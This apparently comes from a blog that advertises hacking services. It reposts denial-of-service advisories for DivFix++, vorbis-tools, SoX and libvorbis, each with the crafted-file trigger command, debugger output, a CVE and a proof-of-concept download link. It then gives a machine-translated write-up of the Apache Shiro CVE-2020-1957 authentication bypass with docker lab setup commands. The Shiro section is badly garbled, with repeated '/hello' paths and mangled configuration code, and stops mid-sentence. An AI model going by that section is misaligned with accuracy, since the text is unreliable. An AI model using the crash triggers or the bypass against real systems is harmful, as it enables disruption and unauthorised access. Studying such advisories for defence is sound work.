Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863133875

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
DivFix++ denial of service vulnerability
================
Author : qflb.wu
===============


Introduction:
=============
DivFix++ is FREE AVI Video Fix & Preview program.


Affected version:
=====
v0.34


Vulnerability Description:
==========================
the DivFixppCore::avi_header_fix function in src/DivFix++Core.cpp in DivFix++ v0.34 can cause a denial of service(invalid memory write and application crash) via a crafted avi file.


./DivFix++ -i DivFix++_v0.34_invalid_memory_write.avi -o out.avi


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
__memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167
167../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
(gdb) bt
#0  __memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167
#1  0x00000000004239d8 in DivFixppCore::avi_header_fix() ()
#2  0x000000000042c0c0 in DivFixppCore::Fix(wxString, wxString, bool, bool, bool, bool) ()
#3  0x000000000041404a in DivFixppApp::OnCmdLineParsed(wxCmdLineParser&) ()
#4  0x0000000000414f6e in DivFixppApp::OnInit() ()
#5  0x0000000000416f4f in wxAppConsoleBase::CallOnInit() ()
#6  0x00007ffff6c6903c in wxEntry(int&, wchar_t**) ()
   from /usr/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0
#7  0x0000000000411e70 in main ()
(gdb) 


-------------------
(gdb) disassemble 0x00000000004239b0,0x00000000004239df
Dump of assembler code from 0x4239b0 to 0x4239df:
   0x00000000004239b0 <_ZN12DivFixppCore14avi_header_fixEv+3504>:add    %al,(%rax)
   0x00000000004239b2 <_ZN12DivFixppCore14avi_header_fixEv+3506>:mov    %eax,%edi
   0x00000000004239b4 <_ZN12DivFixppCore14avi_header_fixEv+3508>:callq  0x434eaf <_Z17make_littleendianIiERT_S0_>
   0x00000000004239b9 <_ZN12DivFixppCore14avi_header_fixEv+3513>:mov    -0x138(%rbp),%rdx
   0x00000000004239c0 <_ZN12DivFixppCore14avi_header_fixEv+3520>:mov    0x38(%rdx),%rdx
   0x00000000004239c4 <_ZN12DivFixppCore14avi_header_fixEv+3524>:lea    0x10(%rdx),%rcx
   0x00000000004239c8 <_ZN12DivFixppCore14avi_header_fixEv+3528>:mov    $0x4,%edx
   0x00000000004239cd <_ZN12DivFixppCore14avi_header_fixEv+3533>:mov    %rax,%rsi
   0x00000000004239d0 <_ZN12DivFixppCore14avi_header_fixEv+3536>:mov    %rcx,%rdi
=> 0x00000000004239d3 <_ZN12DivFixppCore14avi_header_fixEv+3539>:callq  0x40fcc0 <memcpy@plt>
   0x00000000004239d8 <_ZN12DivFixppCore14avi_header_fixEv+3544>:mov    -0x138(%rbp),%rax
---Type <return> to continue, or q <return> to quit---
End of assembler dump.
(gdb) i r 
rax            0x6615286690088
rbx            0x00
rcx            0x1016
rdx            0x44
rsi            0x6615286690088
rdi            0x1016
rbp            0x7fffffffcf100x7fffffffcf10
rsp            0x7fffffffcdd00x7fffffffcdd0
r8             0x8049308407344
r9             0x7ffff7fc1a40140737353882176
r10            0x640000006e429496729710
r11            0x00
r12            0x11
r13            0x11
r14            0x00
r15            0x00
rip            0x4239d30x4239d3 <DivFixppCore::avi_header_fix()+3539>
eflags         0x246[ PF ZF IF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
fs             0x00
---Type <return> to continue, or q <return> to quit---
gs             0x00
(gdb)


POC:
DivFix++_v0.34_invalid_memory_write.avi
CVE:
CVE-2017-11330


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42396.zip
HireHackking 
vorbis-tools oggenc vulnerability
================
Author : qflb.wu
===============


Introduction:
=============
The Vorbis Tools package contains command-line tools useful for encoding, playing or editing files using the Ogg CODEC.


Affected version:
=====
1.4.0


Vulnerability Description:
==========================
the wav_open function in oggenc/audio.c in vorbis-tools 1.4.0 can cause a denial of service(memory allocation error) via a crafted wav file.


./oggenc vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav -o out


==68126==WARNING: AddressSanitizer failed to allocate 0xffffffffffffbc00 bytes
==68126==AddressSanitizer's allocator is terminating the process instead of returning 0
==68126==If you don't like this behavior set allocator_may_return_null=1
==68126==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:149 "((0)) != (0)" (0x0, 0x0)
    #0 0x46d41f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x46d41f)
    #1 0x472c81 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x472c81)
    #2 0x4719c0 in __sanitizer::AllocatorReturnNull() (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4719c0)
    #3 0x4674b6 in __interceptor_malloc (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4674b6)
    #4 0x492896 in wav_open /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:573
    #5 0x496d8e in open_audio_file /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:86
    #6 0x485d0a in main /home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc.c:256
    #7 0x7f6d9f8dcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x47d55c in _start (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x47d55c)


    -----------------
wav->channel_permute = malloc(wav->channels * sizeof(int));
if (wav->channels <= 8)
   /* Where we know the mappings, use them. */
   memcpy(wav->channel_permute, wav_permute_matrix[wav->channels-1], 
           sizeof(int) * wav->channels);
else
   /* Use a default 1-1 mapping */
   for (i=0; i < wav->channels; i++)
       wav->channel_permute[i] = i;


return 1;


Andthe code didn't check the return of malloc.


POC:
vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav
CVE:
CVE-2017-11331


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42397.zip
HireHackking 
Sound eXchange (SoX) multiple vulnerabilities
================
Author : qflb.wu
===============


Introduction:
=============
SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files in to other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms.


Affected version:
=====
14.4.2


Vulnerability Description:
==========================
1.
the startread function in wav.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(divide-by-zero error and application crash) via a crafted wav file.


./sox sox_14.4.2_divide_by_zero_error_1.wav out.ogg


----debug info:----
Program received signal SIGFPE, Arithmetic exception.
0x00007ffff7b9c829 in startread (ft=0x611540) at wav.c:950
950        wav->numSamples = div_bits(qwDataLength, ft->encoding.bits_per_sample) / ft->signal.channels;
(gdb) disassemble 0x00007ffff7b9c829,0x00007ffff7b9c8ff
Dump of assembler code from 0x7ffff7b9c829 to 0x7ffff7b9c8ff:
=> 0x00007ffff7b9c829 <startread+1577>:div    %rcx
   0x00007ffff7b9c82c <startread+1580>:mov    %rax,0x0(%rbp)
   0x00007ffff7b9c830 <startread+1584>:imul   %rcx,%rax
   0x00007ffff7b9c834 <startread+1588>:mov    %rax,0x18(%rbx)
   0x00007ffff7b9c838 <startread+1592>:mov    0x28(%rbp),%r8d
   0x00007ffff7b9c83c <startread+1596>:test   %r8d,%r8d
   0x00007ffff7b9c83f <startread+1599>:je     0x7ffff7b9c849 <startread+1609>
   0x00007ffff7b9c841 <startread+1601>:movq   $0x0,0x18(%rbx)
   0x00007ffff7b9c849 <startread+1609>:mov    %r9d,0x14(%rsp)
   0x00007ffff7b9c84e <startread+1614>:mov    %edi,0x10(%rsp)
   0x00007ffff7b9c852 <startread+1618>:callq  0x7ffff7b50390 <sox_get_globals@plt>
   0x00007ffff7b9c857 <startread+1623>:cmpw   $0x1,0x22(%rsp)
   0x00007ffff7b9c85d <startread+1629>:lea    0x241fa(%rip),%rdx        # 0x7ffff7bc0a5e
   0x00007ffff7b9c864 <startread+1636>:mov    0x10(%rsp),%edi
   0x00007ffff7b9c868 <startread+1640>:mov    0x30(%rsp),%r8d
   0x00007ffff7b9c86d <startread+1645>:lea    0x1de3a(%rip),%rcx        # 0x7ffff7bba6ae
   0x00007ffff7b9c874 <startread+1652>:mov    %rdx,0x40(%rax)
   0x00007ffff7b9c878 <startread+1656>:lea    0x115e7(%rip),%rax        # 0x7ffff7bade66
---Type <return> to continue, or q <return> to quit---q
End of assembler dump.
(gdb) i r
rax            0x5371335
rbx            0x6115406362432
rcx            0x00
rdx            0x00
rsi            0x88
rdi            0x11
rbp            0x611a600x611a60
rsp            0x7fffffffdc000x7fffffffdc00
r8             0x7ffff7fce7c0140737353934784
r9             0x00
r10            0x7fffffffd9c0140737488345536
r11            0x7ffff72cca80140737340295808
r12            0x5371335
r13            0x7fffffffdc50140737488346192
r14            0x7fffffffdc40140737488346176
r15            0x00
rip            0x7ffff7b9c8290x7ffff7b9c829 <startread+1577>
eflags         0x10246[ PF ZF IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
fs             0x00
gs             0x00
(gdb)


POC:
sox_14.4.2_divide_by_zero_error_1.wav
CVE:
CVE-2017-11332


2.
the read_samples function in hcom.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted hcom file.


./sox sox_14.4.2_invalid_memory_read.hcom out.wav


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215
215                if(p->dictionary[p->dictentry].dict_leftson < 0) {
(gdb) bt
#0  read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215
#1  0x00007ffff7b58409 in sox_read (ft=ft@entry=0x611590, buf=<optimized out>, 
    len=8192) at formats.c:978
#2  0x0000000000409dd4 in sox_read_wide (ft=0x611590, buf=<optimized out>, 
    max=<optimized out>) at sox.c:490
#3  0x000000000040a32e in combiner_drain (effp=0x614410, obuf=0x6145f0, 
    osamp=0x7fffffffdbb0) at sox.c:552
#4  0x00007ffff7b68c0d in drain_effect (n=0, chain=0x614260) at effects.c:352
#5  sox_flow_effects (chain=0x614260, 
    callback=callback@entry=0x405a80 <update_status>, 
    client_data=client_data@entry=0x0) at effects.c:445
#6  0x0000000000407bf6 in process () at sox.c:1802
#7  0x0000000000403085 in main (argc=3, argv=0x7fffffffdf98) at sox.c:3008
(gdb) disassemble 
Dump of assembler code for function read_samples:
   0x00007ffff7b93900 <+0>:push   %r15
   0x00007ffff7b93902 <+2>:push   %r14
   0x00007ffff7b93904 <+4>:mov    %rsi,%r14
   0x00007ffff7b93907 <+7>:push   %r13
   0x00007ffff7b93909 <+9>:push   %r12
   0x00007ffff7b9390b <+11>:push   %rbp
   0x00007ffff7b9390c <+12>:push   %rbx
   0x00007ffff7b9390d <+13>:mov    %rdi,%rbx
   0x00007ffff7b93910 <+16>:sub    $0x28,%rsp
   0x00007ffff7b93914 <+20>:mov    0x2d0(%rdi),%r15
   0x00007ffff7b9391b <+27>:mov    0x24(%r15),%esi
   0x00007ffff7b9391f <+31>:test   %esi,%esi
   0x00007ffff7b93921 <+33>:js     0x7ffff7b93a60 <read_samples+352>
   0x00007ffff7b93927 <+39>:mov    0x10(%r15),%rdi
   0x00007ffff7b9392b <+43>:xor    %eax,%eax
   0x00007ffff7b9392d <+45>:lea    (%rax,%rdx,1),%r13d
   0x00007ffff7b93931 <+49>:lea    0x28(%r15),%rbp
   0x00007ffff7b93935 <+53>:mov    %rdx,%r12
   0x00007ffff7b93938 <+56>:lea    0x1(%r13),%eax
   0x00007ffff7b9393c <+60>:mov    %eax,0xc(%rsp)
   0x00007ffff7b93940 <+64>:mov    %r13d,%eax
   0x00007ffff7b93943 <+67>:mov    %r12d,0x8(%rsp)
---Type <return> to continue, or q <return> to quit---
   0x00007ffff7b93948 <+72>:sub    %r12d,%eax
   0x00007ffff7b9394b <+75>:mov    %eax,(%rsp)
   0x00007ffff7b9394e <+78>:jmp    0x7ffff7b93989 <read_samples+137>
   0x00007ffff7b93950 <+80>:lea    -0x1(%rax),%r8d
   0x00007ffff7b93954 <+84>:movslq 0x20(%r15),%rax
   0x00007ffff7b93958 <+88>:mov    0x28(%r15),%edx
   0x00007ffff7b9395c <+92>:mov    (%r15),%rsi
   0x00007ffff7b9395f <+95>:shl    $0x4,%rax
   0x00007ffff7b93963 <+99>:test   %edx,%edx
   0x00007ffff7b93965 <+101>:js     0x7ffff7b939e0 <read_samples+224>
   0x00007ffff7b93967 <+103>:movswq 0x8(%rsi,%rax,1),%rax
   0x00007ffff7b9396d <+109>:mov    %eax,0x20(%r15)
   0x00007ffff7b93971 <+113>:shl    $0x4,%rax
   0x00007ffff7b93975 <+117>:add    %edx,%edx
   0x00007ffff7b93977 <+119>:mov    %r8d,0x24(%r15)
   0x00007ffff7b9397b <+123>:add    %rsi,%rax
   0x00007ffff7b9397e <+126>:mov    %edx,0x28(%r15)
=> 0x00007ffff7b93982 <+130>:cmpw   $0x0,0x8(%rax)
   0x00007ffff7b93987 <+135>:js     0x7ffff7b939f0 <read_samples+240>
   0x00007ffff7b93989 <+137>:test   %rdi,%rdi
   0x00007ffff7b9398c <+140>:jle    0x7ffff7b93a48 <read_samples+328>
   0x00007ffff7b93992 <+146>:mov    0x24(%r15),%eax
   0x00007ffff7b93996 <+150>:test   %eax,%eax
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax            0x631b306495024
rbx            0x6115906362512
rcx            0x11
rdx            0x6900006881280
rsi            0x611b206363936
rdi            0x5241316
rbp            0x611ad80x611ad8
rsp            0x7fffffffda300x7fffffffda30
r8             0x1016
r9             0x7ffff7fce7c0140737353934784
r10            0x7fffffffd7f0140737488345072
r11            0x7ffff72cb2e0140737340289760
r12            0x1ff98185
r13            0x20008192
r14            0x61460c6374924
r15            0x611ab06363824
rip            0x7ffff7b939820x7ffff7b93982 <read_samples+130>
eflags         0x10206[ PF IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
fs             0x00
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/20x $rax+8
0x631b38:Cannot access memory at address 0x631b38
(gdb)


POC:
sox_14.4.2_invalid_memory_read.hcom
CVE:
CVE-2017-11358


3.
the wavwritehdr function in wav.c in Sound eXchange(SoX) 14.4.2 allows remote attackers to cause a denial of service(divide-by-zero error and application crash) via a crafted snd file which convert to wav file.


./sox sox_14.4.2_divide_by_zero_error_2.snd out.wav


----debug info:----
Program received signal SIGFPE, Arithmetic exception.
0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, 
    second_header=second_header@entry=0) at wav.c:1457
1457        blocksWritten = MS_UNSPEC/wBlockAlign;
(gdb) bt
#0  0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, 
    second_header=second_header@entry=0) at wav.c:1457
#1  0x00007ffff7b9c0e9 in startwrite (ft=0x611bf0) at wav.c:1252
#2  0x00007ffff7b59e32 in open_write (
    path=path@entry=0x611bc0 "/home/a/Documents/out.wav", 
    buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, 
    buffer_ptr=buffer_ptr@entry=0x0, 
    buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=signal@entry=0x611410, 
    encoding=encoding@entry=0x611430, filetype=0x611bd6 "wav", 
    oob=oob@entry=0x7fffffffdcd0, 
    overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:912
#3  0x00007ffff7b5a5e8 in sox_open_write (
    path=path@entry=0x611bc0 "/home/a/Documents/out.wav", 
    signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, 
    filetype=<optimized out>, oob=oob@entry=0x7fffffffdcd0, 
    overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:948
#4  0x000000000040847a in open_output_file () at sox.c:1557
#5  process () at sox.c:1754
#6  0x0000000000403085 in main (argc=3, argv=0x7fffffffdfa8) at sox.c:3008
(gdb) disassemble 0x00007ffff7b9a97b,0x00007ffff7b9a9ff
Dump of assembler code from 0x7ffff7b9a97b to 0x7ffff7b9a9ff:
=> 0x00007ffff7b9a97b <wavwritehdr+427>:idivl  0x10(%rsp)
   0x00007ffff7b9a97f <wavwritehdr+431>:movslq %eax,%rcx
   0x00007ffff7b9a982 <wavwritehdr+434>:imul   %eax,%r12d
   0x00007ffff7b9a986 <wavwritehdr+438>:mov    %rcx,0x48(%rsp)
   0x00007ffff7b9a98b <wavwritehdr+443>:imul   %r14d,%eax
   0x00007ffff7b9a98f <wavwritehdr+447>:cmp    $0x31,%bp
   0x00007ffff7b9a993 <wavwritehdr+451>:mov    %eax,0x40(%rsp)
   0x00007ffff7b9a997 <wavwritehdr+455>:je     0x7ffff7b9aff0 <wavwritehdr+2080>
   0x00007ffff7b9a99d <wavwritehdr+461>:cmp    $0x1,%bp
   0x00007ffff7b9a9a1 <wavwritehdr+465>:je     0x7ffff7b9b0a8 <wavwritehdr+2264>
   0x00007ffff7b9a9a7 <wavwritehdr+471>:movzwl 0x3e(%rsp),%eax
   0x00007ffff7b9a9ac <wavwritehdr+476>:movl   $0x0,0x34(%rsp)
   0x00007ffff7b9a9b4 <wavwritehdr+484>:lea    0x12(%rax),%r13d
   0x00007ffff7b9a9b8 <wavwritehdr+488>:mov    %r12d,%eax
   0x00007ffff7b9a9bb <wavwritehdr+491>:and    $0x1,%eax
   0x00007ffff7b9a9be <wavwritehdr+494>:movzwl %r13w,%r13d
   0x00007ffff7b9a9c2 <wavwritehdr+498>:lea    (%r12,%r13,1),%edx
   0x00007ffff7b9a9c6 <wavwritehdr+502>:add    %edx,%eax
   0x00007ffff7b9a9c8 <wavwritehdr+504>:cmp    $0x1,%bp
   0x00007ffff7b9a9cc <wavwritehdr+508>:setne  0x3d(%rsp)
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/10gx $rsp+10
0x7fffffffdaaa:0x00000000000000000x0056000000000000
0x7fffffffdaba:0x00010000000000d40x0001000000000000
0x7fffffffdaca:0x00000000000800000x0000000000000008
0x7fffffffdada:0x0fe000007fff00000x876000007ffff7bc
0x7fffffffdaea:0x00d000007ffff7610x21a0000000000000
(gdb) 


POC:
sox_14.4.2_divide_by_zero_error_2.snd
CVE:
CVE-2017-11359


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42398.zip
HireHackking 
libvorbis multiple vulnerabilities
================
Author : qflb.wu
===============


Introduction:
=============
The libvorbis package contains a general purpose audio and music encoding format. This is useful for creating (encoding) and playing (decoding) sound in an open (patent free) format.


Affected version:
=====
1.3.5


Vulnerability Description:
==========================
1.
the vorbis_analysis_wrote function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(OOM) via a crafted wav file.


I found this bug when I test Sound eXchange(SoX) 14.4.2 which used the libvorbis library.


./sox libvorbis_1.3.5_OOM.wav out.ogg


/var/log/syslog info:
  Jul 13 19:58:05 ubuntu kernel: [] Out of memory: Kill process 44203 (sox) score 364 or sacrifice child
Jul 13 19:58:05 ubuntu kernel: [] Killed process 44203 (sox) total-vm:1831804kB, anon-rss:599932kB, file-rss:40kB


----debug info:----
#0  0x00007ffff5df5e92 in vorbis_analysis_wrote ()
from /usr/local/lib/libvorbis.so.0
#1  0x00007ffff7ba1cba in write_samples (ft=0x611c20, buf=buf@entry=0x0, 
    len=len@entry=0x0) at vorbis.c:358
#2  0x00007ffff7ba1dc5 in stopwrite (ft=<optimized out>) at vorbis.c:398
#3  0x00007ffff7b58488 in sox_close (ft=0x611c20) at formats.c:1006
#4  0x0000000000405fa8 in cleanup () at sox.c:246
#5  0x0000000000403479 in main (argc=argc@entry=0x3, 
    argv=argv@entry=0x7fffffffe5e8) at sox.c:3050
#6  0x00007ffff727bec5 in __libc_start_main (main=0x4029c0 <main>, argc=0x3, 
    argv=0x7fffffffe5e8, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe5d8) at libc-start.c:287
#7  0x0000000000403c65 in _start ()
--------
Program terminated with signal SIGKILL, Killed.
The program no longer exists.


POC:
libvorbis_1.3.5_OOM.wav
CVE:
CVE-2017-11333


2.
the vorbis_block_clear function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(NULL pointer dereference and application crash) via a crafted ogg file.


I found this bug when I test mp3splt 2.6.2 which used the libvorbis library.


./mp3splt -P -t 0.9 libvorbis_1.3.5_null_pointer_dereference.ogg


----debug info:----
0x00007ffff61752c0 in vorbis_block_clear () from /usr/local/lib/libvorbis.so.0
(gdb) disassemble 
Dump of assembler code for function vorbis_block_clear:
   0x00007ffff61752a0 <+0>:push   %r14
   0x00007ffff61752a2 <+2>:mov    %rdi,%r14
   0x00007ffff61752a5 <+5>:push   %r13
   0x00007ffff61752a7 <+7>:push   %r12
   0x00007ffff61752a9 <+9>:push   %rbp
   0x00007ffff61752aa <+10>:push   %rbx
   0x00007ffff61752ab <+11>:mov    0xb8(%rdi),%r13
   0x00007ffff61752b2 <+18>:callq  0x7ffff616b240 <_vorbis_block_ripcord@plt>
   0x00007ffff61752b7 <+23>:mov    0x70(%r14),%rdi
   0x00007ffff61752bb <+27>:test   %rdi,%rdi
   0x00007ffff61752be <+30>:je     0x7ffff61752c5 <vorbis_block_clear+37>
=> 0x00007ffff61752c0 <+32>:callq  0x7ffff616b130 <free@plt>
   0x00007ffff61752c5 <+37>:test   %r13,%r13
   0x00007ffff61752c8 <+40>:je     0x7ffff617530c <vorbis_block_clear+108>
   0x00007ffff61752ca <+42>:mov    $0x1,%r12d
   0x00007ffff61752d0 <+48>:xor    %ebx,%ebx
   0x00007ffff61752d2 <+50>:jmp    0x7ffff61752df <vorbis_block_clear+63>
   0x00007ffff61752d4 <+52>:nopl   0x0(%rax)
   0x00007ffff61752d8 <+56>:add    $0x1,%ebx
   0x00007ffff61752db <+59>:add    $0x1,%r12d
   0x00007ffff61752df <+63>:movslq %ebx,%rax
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax            0x22
rbx            0x61fca06421664
rcx            0x00
rdx            0x7ffff7ba6778140737349576568
rsi            0x00
rdi            0x80128
rbp            0x7fffffffd4700x7fffffffd470
rsp            0x7fffffffd4000x7fffffffd400
r8             0x746e656d75636f008389754676633104128
r9             0x6143506374224
r10            0x7fffffffd1f0140737488343536
r11            0x7ffff61752a0140737322111648
r12            0x6128506367312
r13            0x00
r14            0x6205606423904
r15            0x7ffff7bcf146140737349742918
rip            0x7ffff61752c00x7ffff61752c0 <vorbis_block_clear+32>
eflags         0x202[ IF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
fs             0x00
---Type <return> to continue, or q <return> to quit---
gs             0x00
(gdb) ni


Program received signal SIGSEGV, Segmentation fault.
__GI___libc_free (mem=0x80) at malloc.c:2929
2929malloc.c: No such file or directory.
(gdb) bt
#0  __GI___libc_free (mem=0x80) at malloc.c:2929
#1  0x00007ffff61752c5 in vorbis_block_clear ()
   from /usr/local/lib/libvorbis.so.0
#2  0x00007ffff65ac5ae in splt_ogg_v_free (oggstate=0x61fca0) at ogg.c:162
#3  0x00007ffff65ace0b in splt_ogg_info (in=<optimized out>, 
    state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0) at ogg.c:545
#4  0x00007ffff65acf75 in splt_ogg_get_info (state=state@entry=0x60ddb0, 
    file_input=<optimized out>, error=error@entry=0x7fffffffdbf0) at ogg.c:108
#5  0x00007ffff65ae6c7 in splt_pl_init (state=0x60ddb0, error=0x7fffffffdbf0)
    at ogg.c:1482
#6  0x00007ffff7bcac16 in splt_tp_get_original_tags_and_append (
    error=0x7fffffffdbf0, state=0x60ddb0) at tags_parser.c:545
#7  splt_tp_process_original_tags_variable (tpu=tpu@entry=0x61f800, 
    state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0, 
    set_original_tags=1) at tags_parser.c:514
#8  0x00007ffff7bcb4d1 in splt_tp_process_tag_variable (error=0x7fffffffdbf0, 
    state=0x60ddb0, tpu=0x61f800, end_paranthesis=0x7ffff7bcf14c "]", 
    tag_variable_start=0x7ffff7bcf146 "o,@N=1]") at tags_parser.c:363
#9  splt_tp_process_tags (error=0x7fffffffdbf0, state=0x60ddb0, tpu=0x61f800, 
    tags=0x7ffff7bcf143 "%[@o,@N=1]") at tags_parser.c:293
#10 splt_tp_put_tags_from_string (state=state@entry=0x60ddb0, 
    tags=tags@entry=0x7ffff7bcf143 "%[@o,@N=1]", 
    error=error@entry=0x7fffffffdbf0) at tags_parser.c:192
---Type <return> to continue, or q <return> to quit---
#11 0x00007ffff7bbb4f3 in mp3splt_split (state=state@entry=0x60ddb0)
    at mp3splt.c:1232
#12 0x0000000000403320 in main (argc=<optimized out>, 
    orig_argv=<optimized out>) at mp3splt.c:872
(gdb) 
--------------------
 int vorbis_block_clear(vorbis_block *vb){
 int i;
 vorbis_block_internal *vbi=vb->internal;


 _vorbis_block_ripcord(vb);
 if(vb->localstore)_ogg_free(vb->localstore);  <========


 if(vbi){
   for(i=0;i<PACKETBLOBS;i++){
     oggpack_writeclear(vbi->packetblob[i]);
     if(i!=PACKETBLOBS/2)_ogg_free(vbi->packetblob[i]);
   }
   _ogg_free(vbi);
 }
 memset(vb,0,sizeof(*vb));
 return(0);
 }


POC:
libvorbis_1.3.5_null_pointer_dereference.ogg
CVE:
CVE-2017-11735


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42399.zip
HireHackking

0x00脆弱性の説明

1.5.2より前のApache Shiroにはセキュリティの脆弱性があります。攻撃者は、認証をバイパスするために特別に作成されたリクエストを使用できます。 Shiro Frameworkは、Anon、AuthC、その他のインターセプターなどのインターセプター機能を通じてユーザーアクセス権を制御します。 Anonは匿名のインターセプターであり、アクセスにログインする必要はありません。 AUTHCはログインインターセプターであり、アクセスするためにログインする必要があります。 ShiroのURLパス式はANT形式です。パスワイルドカード *は、ゼロ以上の文字列を一致させることを意味します。/* hello /helloですが、hello /hello /はできません *ワイルドカードはパスに一致できないためです。 /helloインターフェイスにAuthCインターセプターセットがあると仮定すると、アクセス /helloは許可判断を下しますが、 /hello /にアクセスすると、URLと正しく一致することができず、直接リリースしてスプリングインターセプターを入力します。 Form /helloおよび /hello /hello /hello /hello /hello /hello /hello /hello /hello /hello /hello /hello /hello /hello /hello /helloでアクセスしたリソースは、許可バイパスを達成します。

0x01脆弱性の影響

Apache Shiro 1.5.2

0x02 shiro interceptor

Shiro Frameworkは、インターセプター関数を使用して、ユーザーアクセス権を制御およびインターセプトします。 Shiroの一般的なインターセプターには、Anon、AuthC、その他のインターセプターが含まれます。 1.アノンは匿名のインターセプターであり、ログインせずにアクセスできます。一般に、静的リソースまたはモバイルインターフェイスに使用されます。

2.AUTHCは、アクセスするためにログイン認証を必要とするリソースです。ユーザーは、一致するURL構成をshiro.iniに記述することができます。これにより、一致するURLがインターセプトされ、応答インターセプターが実行されます。これにより、URLのアクセス制御が実現し、URLパス式は通常ANT形式です。次の構成として、 /index.htmlホームページにアクセスする場合、shiroはログイン判断を下さず、アノンインターセプターはログインせずにアクセスできます。 [urls]

/index.html=anon

/user/**=authc

ShiroのURLパス式はアリの形式であり、パスワイルドカードがサポートしていますか?***。文字を一致させます

*:ゼロ以上の文字列を一致させます

**:パスのゼロ以上のパスを一致させます

ここで、 *はゼロ以上の文字列を一致させることを意味します。/*は/* helloと一致することができますが、 /hello /ではありません *ワイルドカードはパスに一致できないためです。 /helloインターフェイスにAuthCインターセプターがあると仮定すると、アクセス /Helloは許可を得るために判断されます。要求されたuriが /hello /である場合、 /*urlパス式は正しく一致して解放されません。次に、スプリング(サーブレット)インターセプターを入力すると、 /helloフォームと /hello /formのURLでアクセスされるリソースが同じです。

0x03環境構築

ダウンロードデモコード:https://github.com/lenve/javaboy-code-samples/master/shiro/shiro-basicImport Ideashiroバージョン1.4.2 Groupidorg.apache.shiro/groupid artifactidshiro-spring/artifactid version1.4.2/version/dependencymodify shiroconfig configurationファイルとauthcインターセプター@bean shirofiltorybean shirofilterfactorybean(){shirofilterfactorybean bean() . //map.put('/d '、' authc '); map.put( '/hello/*'、 'authc'); bean.setFilterChainDefinitionMap(Map);豆を返します。 }ルーティングコントローラーメソッド@getMapping( '/hello/{currentPage}')public string hello( @pathvariable integer currentPage){return 'hello';}アイデアをコンパイルすると、戦争パッケージを取得できます。 Here you can quickly build the vulnerability environment through docker: docker pull vulfocus/shiro-cve_2020_1957 1049983-20201129040308848-1645994369.pngdocker images 1049983-20201129040310600-1437781155.pngdocker run -d -p 8080:8080 -v /var/run/docker.sock:/var/run/docker.sock -e vul_ip=192.168.1.14 29136b1d3c61 1049983-20201129040311058-1699321640.png-V/var/run/docker.sock:/var/run/docker.sockはドッカーインタラクティブ接続です。 -e docker_urlはDocker接続法です。デフォルトでは、unix: //var/run/docker.sock、またはtcp: //xxx.xxx.xxx.xxx:2375(ポート2375を開く必要があります)を介して接続できます。 -v /vulfocus-api/db.sqlite3:db.sqlite3マップデータベースはローカルファイルです。 -e 